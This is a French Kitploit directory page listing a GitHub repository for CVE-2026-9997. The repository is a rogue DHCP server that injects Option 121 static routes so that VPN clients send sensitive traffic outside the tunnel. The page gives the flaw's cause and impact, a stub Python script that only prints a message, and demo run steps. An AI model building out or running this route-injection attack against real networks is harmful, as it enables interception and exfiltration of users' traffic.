Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2026-9997-VPN-Split-Tunneling-Bypass-via-DHCP-Option-Injection — Serveur DHCP malveillant pour CVE-2026-9997 : injecte des routes statiques Option 121 dans les clients VPN, contournant le split tunneling pour exfiltrer le trafic sensible. | Kitploit
Outils/GitHubGitHub/george0papasotiriou/cve-2026-9997-vpn-split-tunneling-bypass-via-dhcp-option-injection
Analyse des VulnérabilitésExploitationExfiltration de DonnéesSécurité RéseauTests d'IntrusionRed Teaming
GitHubgeorge0papasotiriou/cve-2026-9997-vpn-split-tunneling-bypass-via-dhcp-option-injection

CVE-2026-9997-VPN-Split-Tunneling-Bypass-via-DHCP-Option-Injection

Serveur DHCP malveillant pour CVE-2026-9997 : injecte des routes statiques Option 121 dans les clients VPN, contournant le split tunneling pour exfiltrer le trafic sensible.

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager
Voir le dépôt
il y a 17 joursPas encore vérifié

CVE-2026-9997 – Contournement du split tunneling VPN via l'injection d'options DHCP

Code du programme (serveur DHCP simulé + client en Python)

root@kitploit:~
#!/usr/bin/env python3
# rogue_dhcp_server.py - Injects a static route to bypass VPN split tunnel
import socket, struct, threading

def send_dhcp_offer(client_mac, offer_ip):
    # Craft a DHCP OFFER packet with Option 121 (Classless Static Route)
    # This option adds a route that sends traffic to a sensitive subnet via the attacker's gateway.
    # We'll simulate by creating a raw packet (simplified).
    # In a real attack, we'd use scapy; here we just demonstrate the concept.
    print(f"Sending DHCP OFFER to {client_mac} with malicious static route...")
    # The client would then apply this route and leak traffic.

CVE-2026-9997 – Contournement du split tunneling VPN via l'injection d'options DHCP

Severity: High

Aperçu

Un client VPN d'entreprise accepte les options DHCP (option 121 – routes statiques sans classe) provenant du réseau local sans validation. Un attaquant sur le même LAN peut injecter des routes qui envoient le trafic sensible hors du tunnel VPN chiffré.

Détails de la vulnérabilité

  • Type : Injection de configuration réseau
  • Impact : Exfiltration de données, contournement des politiques de sécurité VPN.
  • Cause racine : Le client VPN applique aveuglément les routes statiques fournies par DHCP, même après l'établissement du tunnel.

Démonstration de l'exploitation

  1. Démarrez le serveur DHCP malveillant :
    root@kitploit:~
    python rogue_dhcp_server.py
    
  2. Sur la machine victime (simulée), exécutez la simulation du client :
    root@kitploit:~
    python vpn_client_sim.py
    
Télécharger l’outil